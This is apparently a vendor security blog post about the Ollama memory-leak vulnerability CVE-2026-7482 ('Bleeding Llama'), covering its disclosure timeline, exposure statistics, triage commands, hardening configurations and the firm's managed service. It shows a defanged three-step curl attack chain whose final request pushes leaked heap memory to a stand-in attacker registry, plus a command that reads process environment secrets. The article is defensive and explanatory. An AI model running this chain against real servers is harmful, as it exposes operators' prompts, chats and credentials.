Bleeding Llama (CVE-2026-7482): Why Self-Hosted AI Isn't Automatically Secure AI

Editorial note: The information in this article was compiled to the best of our knowledge at the time of publication. Technical details, prices, versions, licensing terms, and external content may change. Please verify the information provided independently, particularly before making business-critical or security-related decisions. This article does not replace individual professional, legal, or tax advice.

Run local AI safely — as a managed service — WZ-IT runs Ollama, OpenWebUI and friends with auth proxy, network segmentation and CVE monitoring as defaults. Patches in hours, not months — documented for NIS2. Book a kickoff call · More about CVE monitoring · Open WebUI hosting
Three unauthenticated API calls. No login, no exploit framework, no privilege escalation. Three POST requests to a default port, and the machine's memory is on its way out — with system prompts, parallel chat sessions, API keys and database credentials. An estimated 300,000 Ollama instances are reachable worldwide, 8.9 percent of them in Germany: the third-largest country for exposed Ollama servers.
CVE-2026-7482 — dubbed "Bleeding Llama" by its discoverers — is a critical memory-leak vulnerability (CVSS 9.1) in Ollama's GGUF model loader. The patch has been available since February 2026. Official CVE assignment, and therefore visibility in vulnerability scanners? Only since 1 May. Three months between patch and disclosure — and the majority of operators were entirely unaware.
This piece sorts out what happened, who is affected, what to do immediately, and which architectural lessons apply to anyone marketing local AI as a sovereignty story. The core thesis: self-hosting is the right horse for GDPR and the EU AI Act — but only if the operations layer behind it actually exists. Otherwise the sovereignty advantage flips into a security liability.
Table of contents
- What Bleeding Llama is
- How the attack works
- Why around 300,000 servers are exposed
- What the incident reveals about the AI ecosystem
- Who in your organisation is at risk
- Immediate actions for IT leads
- Hardening posture for production Ollama deployments
- The lesson for decision-makers
- How we approach this at WZ-IT
- Further reading
What Bleeding Llama is
- CVE ID: CVE-2026-7482
- Severity: CVSS 9.1 (critical)
- Class: heap out-of-bounds read in the GGUF model loader
- Authentication: none required
- Complexity: three API calls
- Affected versions: all Ollama releases before 0.17.1
- Patch shipped: 25 February 2026 (Ollama 0.17.1)
- CVE published: 1 May 2026 (Echo CNA, after nearly two months of silence at MITRE)
- Discoverer: Dor Attias / Cyera Research
At its core, Bleeding Llama is a memory-read flaw. A crafted GGUF file declares a tensor size that significantly exceeds the actual data block. While processing the file, the Ollama server in fs/ggml/gguf.go and server/quantization.go reads past the allocated heap buffer — and serves the result as part of the "converted" model. Whatever neighbouring heap memory holds at that moment ends up baked into the model artefact. A single POST /api/push to an attacker-controlled registry then exfiltrates the data.
Three properties make the bug particularly nasty:
- No authentication. Ollama ships with no built-in login. Whoever can reach the port can attack.
- No visible traces. No crash, no stack trace, no failed request in the logs. Only dedicated endpoint monitoring on /api/create and /api/push would catch the attack in flight.
- Direct exfiltration. Heap content does not take a detour — it is written straight into the uploaded model artefact and shipped to an external endpoint. Three calls, done.
How the attack works
The exploit consists of three steps and is reproducible with vanilla curl.
Step 1 — Upload a crafted GGUF file. The attacker builds a GGUF file whose tensor header declares a size larger than the actual data block. It is uploaded via POST /api/blobs/sha256:<digest>. Ollama accepts the upload without inspecting the contents — the digest matches the declared hash, and the file format is only interpreted at processing time.
Step 2 — Trigger conversion. A POST /api/create referencing the previously uploaded file instructs Ollama to convert or quantise it into a new model. This is where the out-of-bounds read fires: the server walks the heap buffer along the fake tensor size, runs past the allocation, and packs adjacent heap memory into the output model.
Step 3 — Exfiltration via push. A POST /api/push with the converted model and a target registry like registry.attacker.com/leaked-model ships the artefact off-host. The attacker pulls their own model down from their own registry afterwards and dissects the heap content.
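For orientation, the request sequence looks roughly like this. This is a deliberately defanged sketch: the crafted GGUF payload that actually triggers the over-read is not shown, the digest, file and registry names are placeholders, and the exact JSON field names vary between Ollama versions. Its value for defenders is that it shows precisely which three endpoints monitoring, rate limiting and egress rules need to cover.
# Step 1: upload a blob (the malicious GGUF itself is not reproduced here)
curl -X POST http://target:11434/api/blobs/sha256:<digest> --data-binary @crafted.gguf
# Step 2: have Ollama convert/quantise the blob into a new model (the out-of-bounds read fires here)
curl -X POST http://target:11434/api/create -d '{"model": "leak", "files": {"crafted.gguf": "sha256:<digest>"}}'
# Step 3: push the resulting artefact, heap content included, to an external registry
curl -X POST http://target:11434/api/push -d '{"model": "registry.attacker.com/leaked-model"}'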
What typically lives in the heap:
- System prompts of running models (corporate know-how, tone-of-voice instructions, safety guardrails)
- Parallel chat sessions of other users (user prompts, model responses, conversation history)
- Environment variables of the Ollama process — usually the killer: API keys (OpenAI, Anthropic, cloud providers), database credentials, JWT signing keys, service account tokens
- Proprietary code sent for summarisation or code review
- File contents that flowed through RAG pipelines
- Tool outputs from agentic setups — Claude Code, LangChain, AutoGen all push everything the tool sees through the inference layer
Cyera's framing is sober: from an organisation's inference stream you essentially learn everything the organisation does. API keys, proprietary code, customer contracts, personnel data — anything that lives in prompts lives in the heap.
Why around 300,000 servers are exposed
The scale of the problem only surprises on second glance. Three structural factors make Ollama the shadow-AI platform par excellence.
Default without authentication. Ollama ships no built-in auth layer. That's pragmatic for a developer's local setup; in production it is an invitation. The official GitHub issue #11941 for a "Secure Mode" has been open for months — until then, every production setup depends on a fronting reverse proxy with authentication.
The OLLAMA_HOST=0.0.0.0 configuration trap. By default Ollama binds to 127.0.0.1 — safe, but useless for multi-user setups. Tutorials therefore recommend OLLAMA_HOST=0.0.0.0 as a quick fix, often without flagging that this also gives every other host on the network access. The official docs mention it; many third-party sources skip the warning. Result: thousands of instances directly reachable from the internet.
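If multi-user access is the reason for reaching for 0.0.0.0, the safer pattern is to keep the bind on loopback and publish access only through an authenticated proxy. A minimal sketch for a systemd-managed install and for Docker; service names, image tags and volume paths are assumptions to adapt:
# systemd install: pin the bind explicitly instead of trusting tutorial defaults
sudo systemctl edit ollama
# add in the override:
#   [Service]
#   Environment="OLLAMA_HOST=127.0.0.1:11434"
sudo systemctl restart ollama
# Docker: publish the port on loopback only; the reverse proxy talks to 127.0.0.1
docker run -d --name ollama -p 127.0.0.1:11434:11434 -v ollama:/root/.ollama ollama/ollama:0.17.1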
Shadow AI. Dev teams stand up Ollama on their own because "local AI" sells more easily internally than an OpenAI account. IT and security frequently learn about it only after an incident. Bishop Fox demonstrated in May 2026 with the open-source AIMap tool how trivially exposed AI endpoints (Ollama, vLLM, LiteLLM, OpenWebUI, MCP servers) can be discovered — and that only 13 percent of organisations have any AI-specific security controls in place at all.
The geographic distribution of exposed servers (Cisco Talos study, September 2025):
- USA: 36.6 percent
- China: 22.5 percent
- Germany: 8.9 percent
- France, the United Kingdom, the Netherlands, Japan and South Korea follow in single digits
Germany is therefore not "also a bit affected" but a top-three location worldwide. In absolute numbers, with Cyera's estimate of 300,000 instances, that translates to roughly 27,000 exposed Ollama servers with German IPs. The fact that the bug had been patched for three months and still has impact is not Ollama's fault per se — it is the disclosure vacuum.
What the incident reveals about the AI ecosystem
The CVE-assignment story is more instructive than the bug itself.
- 2 February 2026: Cyera privately reports the bug to Ollama.
- 25 February 2026: Ollama confirms, ships the fix, releases version 0.17.1 — without flagging the patch as a security fix. Release notes use routine language like "stability fixes".
- 2 March 2026: Cyera files the CVE request with MITRE.
- 26 March, 26 April: Follow-up requests to MITRE go unanswered.
- 28 April 2026: Cyera escalates to the alternative CVE Numbering Authority Echo, which assigns CVE-2026-7482 the same day.
- 1 May 2026: Public disclosure.
In practice: for three months a patch was available but invisible to the world. Vulnerability scanners typically know about vulnerabilities only via CVE IDs — no CVE, no match, no warning. Threat feeds, SIEM rules, compliance reports: all blind. Anyone without their own patch management with version tracking simply did not deploy the patch, because nobody alerted them.
The pattern is not new. 2024 — Probllama: an RCE in the same Ollama stack, found by Wiz Research. September 2025 — Cisco Talos Shodan study: more than 1,100 unauthenticated Ollama instances found in ten minutes. May 2026 — AIMap demo: more than 175,000 exposed Ollama instances plus a growing number of unprotected vLLM and LiteLLM endpoints.
The line from the Cisco Talos study that nails it: widespread neglect of fundamental security practices such as access control, authentication, and network isolation in the deployment of AI systems — often stemming from organisations rushing to adopt emerging technologies without informing IT or security teams.
The subtext: in 2026 the AI ecosystem is where webserver operations were in 1999. Open by default, normalised by tutorials, without structural security defaults. Bleeding Llama is not the first and not the last incident of this kind — it is currently the most visible.
Who in your organisation is at risk
Four profiles where the bug bites directly.
Companies with Ollama as an internal AI assistant. When employees talk to Ollama via an OpenWebUI front-end or an internal chat UI, every conversation runs through the same heap memory. An attacker with API access gets a cross-section of what the workforce is currently asking — from contract drafts to recruiting data.
Dev teams with agentic workflows. Claude Code, Continue, LangChain, AutoGen, MCP servers: all of these tools push file contents, code snippets and tool outputs through the LLM backend. With a self-hosted backend like Ollama, all of that data lands in the heap. A successful attack hands over not just API keys but source code, database schemas and customer data on top.
Regulated industries. Anyone in healthcare, finance, legal or the public sector running local AI — precisely because the cloud path doesn't fit regulatorily — has exactly the kind of data in the heap that needs the strongest protection. PII, PHI, attorney-client information, banking secrecy. A Bleeding Llama hit here is a reportable incident under GDPR Art. 33.
Local LAN instances. At risk even without direct internet exposure if other users or applications share the same network segment. A compromised office workstation in the same VLAN is enough. Network segmentation is not a nice-to-have here, it is a baseline requirement.
Quick risk indicators for IT leadership:
- Is Ollama running with OLLAMA_HOST=0.0.0.0 and no fronting auth proxy?
- Is port 11434 reachable from outside the server network?
- Is an Ollama version below 0.17.1 in use?
- Does the Ollama process environment contain secrets (typical answer: yes)?
- Is there logging and monitoring on /api/create and /api/push?
Three or more hits: Bleeding Llama is a realistic actual risk, not a theoretical one.
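A quick triage sketch for the checklist, run directly on the Ollama host. It assumes shell access to a standard install; process names and paths may differ in container setups:
# Version check: anything below 0.17.1 is vulnerable
curl -s http://localhost:11434/api/version
# Bind address: 0.0.0.0 or a routable IP means the whole network segment can reach the API
sudo ss -ltnp | grep 11434
# Secrets in the process environment: whatever shows up here is what a heap leak can expose
sudo tr '\0' '\n' < /proc/$(pgrep -xo ollama)/environ | grep -iE 'key|token|secret|password'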
Immediate actions for IT leads
Within 24 hours.
# Check version
ollama --version
# Update via installer
curl -fsSL https://ollama.com/install.sh | sh
# Docker stack
docker pull ollama/ollama:latest && docker compose up -d
Then verify with curl http://localhost:11434/api/version that the running instance is actually on 0.17.1 or higher. If you use a packaged version from distribution repos, check the maintainer's patch status separately — some distributions lag.
Within one week.
- Asset inventory. Which hosts, containers and VMs run Ollama? Capture shadow IT pragmatically via nmap -p 11434 across the internal network (see the sketch after this list).
- Audit internet exposure. Use Shodan or your asset scanner of choice. Nothing on Ollama port 11434 should be reachable from the public internet.
- If compromise is suspected, rotate secrets. All API keys (OpenAI, Anthropic, cloud providers), DB credentials, JWT signing keys, service tokens. Whatever sat in the Ollama process heap is potentially in foreign hands.
- Front it with an auth proxy. Nginx, Caddy or Traefik with Basic Auth (minimum), better OAuth2 (via Authentik or Zitadel, for example) or mTLS for machine-to-machine setups.
- Network segmentation. Ollama into its own VLAN, strict egress rules, outbound connections only to known registries.
- Audit agentic integrations. Which tools (Claude Code, LangChain, MCP servers) talk to your local Ollama? Which of them have file system access? What flowed through them in the past 90 days?
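A sketch for the inventory and exposure steps. The CIDR, the sample host IP and the Shodan query range are placeholders for your own address space:
# Internal sweep: which hosts answer on the Ollama port?
nmap -p 11434 --open -oG - 10.0.0.0/16 | awk '/11434\/open/ {print $2}'
# For each hit: confirm it is Ollama and record the version for the patch backlog
curl -s --max-time 3 http://10.0.5.17:11434/api/version
# External view via the Shodan CLI (API key required): nothing in your public ranges should answer
shodan search 'port:11434 net:203.0.113.0/24'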
Mid-term. Build out the hardening posture sketched in the next section. Bleeding Llama is not the end point but the trigger to move local AI permanently to production maturity.
Hardening posture for production Ollama deployments
Eight building blocks that any Ollama instance beyond a developer's toy should have.
1. Never 0.0.0.0 without a reverse proxy. Default is 127.0.0.1. Solve multi-user via a reverse proxy, not by opening up the bind. If 0.0.0.0 is mandatory (container setup), put an auth layer in front.
2. Reverse proxy with TLS 1.3. Nginx, Caddy or Traefik. TLS termination, HSTS, modern cipher suite. Self-signed is fine for internal setups; Let's Encrypt or your own CA for anything reachable via DNS.
3. Authentication. Ranked by effort: Basic Auth (minimum, fine for internal setups), OAuth2/OIDC via Authentik / Keycloak / Zitadel (the standard for multi-user), mTLS (for service-to-service in regulated environments).
4. Rate limiting and API gateway. limit_req in Nginx or a gateway like Kong or Tyk. Throttle /api/create and /api/push strictly — the Bleeding Llama exploit needs at most three requests per leak; a rate limit of ten requests per minute per IP makes the attack uneconomic at scale.
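A minimal Nginx sketch covering building blocks 2 to 4: TLS termination, Basic Auth and a tight rate limit on exactly the endpoints the exploit needs. Hostname, certificate paths, user name and limits are placeholders; in a multi-user production setup OAuth2/OIDC or mTLS would replace the auth_basic lines:
# written as a heredoc so the whole sketch stays plain shell
sudo tee /etc/nginx/conf.d/ollama.conf >/dev/null <<'EOF'
limit_req_zone $binary_remote_addr zone=ollama_admin:10m rate=10r/m;

server {
    listen 443 ssl;
    server_name ollama.internal.example.com;
    ssl_certificate     /etc/nginx/certs/ollama.crt;
    ssl_certificate_key /etc/nginx/certs/ollama.key;
    ssl_protocols TLSv1.3;

    auth_basic           "Ollama";
    auth_basic_user_file /etc/nginx/ollama.htpasswd;

    # throttle exactly the endpoints the Bleeding Llama chain needs
    location ~ ^/api/(create|push|blobs) {
        limit_req zone=ollama_admin burst=5 nodelay;
        proxy_pass http://127.0.0.1:11434;
    }

    location / {
        proxy_pass http://127.0.0.1:11434;
        proxy_set_header Host $host;
    }
}
EOF
sudo htpasswd -c /etc/nginx/ollama.htpasswd alice   # prompts for a password
sudo nginx -t && sudo systemctl reload nginx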
5. Network segmentation. Ollama in its own VLAN, firewall rules on a whitelist principle. Inbound only from the auth proxy, outbound only to defined registries. On Proxmox or Kubernetes you can steer this granularly via Proxmox SDN network policies or Kubernetes NetworkPolicy.
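Where the stack runs on Kubernetes, the whitelist principle can be sketched as a NetworkPolicy. Namespace, labels and the registry CIDR are assumptions, and DNS egress to kube-dns usually needs an additional allow rule:
kubectl apply -f - <<'EOF'
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: ollama-isolation
  namespace: ai
spec:
  podSelector:
    matchLabels:
      app: ollama
  policyTypes: ["Ingress", "Egress"]
  ingress:
    # inbound only from the auth proxy pods
    - from:
        - podSelector:
            matchLabels:
              app: auth-proxy
      ports:
        - port: 11434
  egress:
    # outbound only to the internal model registry
    - to:
        - ipBlock:
            cidr: 10.0.20.10/32
      ports:
        - port: 443
EOF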
6. Container isolation and least privilege. Don't run Ollama as root. Dedicated ollama user with minimal permissions. Read-only container filesystem, resource limits, AppArmor or SELinux profile. No service-account tokens in environment variables — mount them as scoped secrets.
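A hedged docker run sketch along those lines. The official ollama/ollama image runs as root and writes to /root/.ollama by default, so the non-root UID and the model path below are assumptions; make sure the named volume is writable by that UID (GPU setups additionally need device flags):
docker run -d --name ollama \
  --user 1000:1000 \
  --read-only --tmpfs /tmp \
  -e OLLAMA_MODELS=/models \
  -v ollama-models:/models \
  --memory 16g --cpus 8 \
  --security-opt no-new-privileges \
  --cap-drop ALL \
  -p 127.0.0.1:11434:11434 \
  ollama/ollama:0.17.1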
7. Egress filtering. The Bleeding Llama exploit needs an outbound connection to its push target. Strict egress rules that allow only known model registries (registry.ollama.ai, your own private registry) close the exfil path — even if the bug stays unpatched.
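A minimal egress sketch with ufw on the Ollama host; 10.0.20.10 stands in for your internal registry, and hosts that also need package mirrors or monitoring endpoints require additional allow rules:
# default-deny outbound, then allow DNS plus HTTPS to the one registry Ollama may talk to
sudo ufw default deny outgoing
sudo ufw allow out 53
sudo ufw allow out to 10.0.20.10 port 443 proto tcp
sudo ufw enable
# everything else, including a push to registry.attacker.com, is dropped even on an unpatched host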
8. Monitoring and anomaly detection. Log every request to /api/create and /api/push, with anomaly detection on unusual push targets, unusual model sizes, unusual request frequencies. A central logging stack (Wazuh, OpenSearch, Graylog) is the difference between "would have been caught" and "ran silently for three months".
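A deliberately simple starting point, assuming the auth proxy writes combined-format access logs to /var/log/nginx/ollama_access.log (a hypothetical path); a production setup would ship the same events into Wazuh or OpenSearch and alert on them:
# per-source count of calls to the two endpoints the exploit needs; review anything unexpected
awk '$7 ~ /^\/api\/(create|push)/ {print $1, $7}' /var/log/nginx/ollama_access.log | sort | uniq -c | sort -rn
# cron-friendly check: on most single-team deployments any /api/push at all is worth an alert
grep -c 'POST /api/push' /var/log/nginx/ollama_access.log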
Cover all eight points and you have not only survived Bleeding Llama but built the foundation for the next vulnerability — because the next one is coming.
The lesson for decision-makers
Local AI is the right answer to a number of pressing questions — GDPR, the EU AI Act, data residency, vendor lock-in, sovereignty. But: local AI is not automatically secure AI. It is an architectural choice that shifts responsibility — from the cloud vendor to your own IT organisation.
Bleeding Llama makes that shift visible. Two years ago "local AI" was the bold call — today it is widespread, often without the operations side scaling along. The shadow-AI wave has produced instances in many companies that nobody tracks, nobody patches and nobody monitors.
Three implications for decision-makers:
Self-hosting without an operations layer is an empty promise. "We host locally" does not cut it — the question is who patches, monitors, segments and audits. If you can't answer that clearly, you have a sovereignty label without sovereignty substance. A successful Bleeding Llama hit is, in case of doubt, a notifiable incident under GDPR Art. 33 — and therefore a board-level item.
CVE monitoring is mandatory, not optional. A bug that was patched and invisible for three months is exactly the scenario systematic patch management is supposed to catch. "We read the release notes" already lost the game — the release notes did not flag the patch as a security fix. Structured CVE monitoring checks against vendor feeds even without a CVE ID and compares running versions against public patches.
NIS2 changes who owns the question. Germany's NIS2 transposition act, in force since early 2026, makes vulnerability management an explicit responsibility of management boards. On violation, leadership is personally liable — up to €10 million or two percent of global turnover, in the worst case from private assets. Anyone rolling out local AI without building the corresponding operations layer is therefore exporting a concrete liability risk upwards.
The fix is not "less local AI" but "more professionally operated local AI". Keep the GDPR win — and add the security one.
How we approach this at WZ-IT
We run local AI stacks as a managed service in three stages.
Stage 1 — architecture and stack. We build Ollama, OpenWebUI, AnythingLLM or vLLM as a hardened stack on our own infrastructure in Germany — on request inside your own Proxmox cluster, on Hetzner, netcup or on-premise. OAuth2-fronted auth proxy, TLS 1.3, network segmentation, egress filtering and container isolation are not options, they are defaults. Optionally on dedicated GPU hardware like the AI Cube or DGX Spark.
Stage 2 — CVE monitoring and patch management. Our managed operations service checks daily against NVD, CISA-KEV, OSV, BSI advisories and vendor-specific feeds. A silently patched bug like Bleeding Llama is exactly what we would have caught via version tracking against the Ollama GitHub repo, even without a CVE ID. We patch critical vulnerabilities within agreed response times, documented for NIS2 audits.
Stage 3 — compliance and reporting. Architecture documentation, defined RTO and RPO, monthly patch report to leadership, documented restore tests, audit trail for GDPR data subject requests and EU AI Act obligations. Anyone classified as a high-risk system under the EU AI Act (see our piece on the EU AI Act from August 2026) gets the necessary evidence on demand.
In practice: you give us your use cases, models and compliance constraints — we deliver the stack, run it, and make sure the next Bleeding Llama type vulnerability is a patch ticket rather than a shadow-AI scandal.
Further reading
- CVE monitoring & vulnerability scanning as a managed service — the central service behind structured response to bugs like Bleeding Llama
- Open WebUI hosting — the standard UI for Ollama, run hardened on our infrastructure
- AI Cube — dedicated GPU hardware for local AI — when inference load outgrows what a VM can deliver
- Linux kernel vulnerabilities 2026: patch management at board level — the NIS2 context in detail
- CVE monitoring for self-hosted software — how structured response to vulnerabilities works
- Llama 4 vs. Qwen 3.5 vs. DeepSeek V4 — model selection for local enterprise AI
- DGX Spark vs. AI Cube — hardware decisions for local AI
- EU AI Act from August 2026 — the regulatory frame local AI operates within in 2026
Are you running Ollama, OpenWebUI or another local AI stack — and unsure whether Bleeding Llama affects you? We review your stack at no cost: version audit, exposure check, auth-layer review, egress analysis. Output: a concrete recommendation with priorities, or direct takeover as a managed service.
Book a free AI security review · More about CVE monitoring · Open WebUI hosting
Frequently Asked Questions
Answers to important questions about this topic
What is Bleeding Llama (CVE-2026-7482)?
A critical vulnerability (CVSS 9.1) in Ollama's GGUF model loader, published on 1 May 2026 by Cyera Research. Three unauthenticated API calls (POST /api/blobs, /api/create, /api/push) are enough to use a heap out-of-bounds read to bleed the server's memory — including system prompts, parallel chat sessions, environment variables, API keys and database credentials. Fix: update to Ollama 0.17.1 or newer.
What data can leak through an attack?
Anything that lives in Ollama's heap memory at the moment of the attack: system prompts of running models, parallel user prompts and chat histories, the entire process environment (OpenAI and Anthropic API keys, DB credentials, JWT tokens, cloud service secrets), proprietary code that was sent to the model, plus — for agentic setups (Claude Code, LangChain) — tool outputs and file contents. Cyera describes it as effectively the entire inference stream of an organisation.
How exposed is Germany?
Cisco Talos analysed the geographic distribution of exposed Ollama servers in September 2025: USA 36.6 percent, China 22.5 percent, Germany 8.9 percent — the third-largest country worldwide. German companies are in the top three when it comes to publicly reachable, often unprotected Ollama instances. The shadow-AI wave has not spared the German Mittelstand.
What should operators do right now?
1. Check ollama --version, update to 0.17.1 or newer. 2. Audit internet exposure — port 11434 must not be reachable publicly. 3. If compromise is suspected, rotate all secrets (API keys, DB credentials, JWT signing keys). 4. Put an authentication proxy in front (Nginx or Caddy with OAuth2 or mTLS). 5. Introduce network segmentation and enable egress filtering. 6. Monitor logs for /api/create and /api/push, enable anomaly detection.
Why did the CVE appear only months after the patch?
Ollama shipped the fix in version 0.17.1 but did not flag it as a security patch. Cyera filed the CVE request with MITRE on 2 March 2026 and waited nearly two months without a response. Only after escalating to the alternative CNA Echo did CVE-2026-7482 get assigned on 28 April. The result: vulnerability scanners did not detect the bug, threat feeds carried no entry, operators were unaware. This is the strongest possible argument for structured CVE monitoring beyond the NVD-only feed.
Is OpenWebUI also affected?
OpenWebUI itself is not directly affected by CVE-2026-7482. But: OpenWebUI is the standard UI for Ollama, almost always in the same network segment, often in the same container stack. If Ollama is the backend for OpenWebUI and Ollama isn't patched, every OpenWebUI conversation indirectly leaks too — they all flow through Ollama. Bishop Fox also showed in May 2026 with AIMap that OpenWebUI endpoints are increasingly exposed. OpenWebUI operators should walk the same hardening path (auth proxy, egress filtering, network segmentation).
How does WZ-IT run local AI securely?
We operate local AI stacks (Ollama, OpenWebUI, AnythingLLM, vLLM) as a managed service on our own infrastructure in Germany — with authentication proxy, network segmentation, egress filtering and container isolation as the default, not as an extra. CVE monitoring via our managed operations service checks daily against NVD, CISA-KEV and vendor-specific feeds — critical bugs are patched within hours, not weeks. Plus: documented architecture for NIS2 audits, defined RTO and RPO, and a personal contact.

Written by
Timo Wevelsiep
Co-Founder & CEO
Co-Founder of WZ-IT. Specialized in cloud infrastructure, open-source platforms and managed services for SMEs and enterprise clients worldwide.